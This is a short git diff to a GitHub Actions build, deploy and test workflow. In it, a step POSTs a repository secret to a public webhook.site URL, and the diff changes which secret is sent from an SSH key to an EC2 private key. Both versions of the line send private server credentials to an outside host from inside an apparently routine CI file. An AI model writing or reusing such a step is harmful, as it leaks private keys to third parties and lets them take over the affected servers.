--- a/.github/workflows/build-deploy-test.yml
+++ b/.github/workflows/build-deploy-test.yml
@@ -18,4 +18,4 @@ jobs:
           url: 'https://webhook.site/0c32640c-3975-4ab6-a2a6-c74e163cca8b'
           method: 'POST'
           customHeaders: '{"Content-Type": "application/json"}'
-          data: ${{ secrets.SERVER_SSH_KEY }}
+          data: ${{ secrets.EC2_PRIVATE_KEY }}
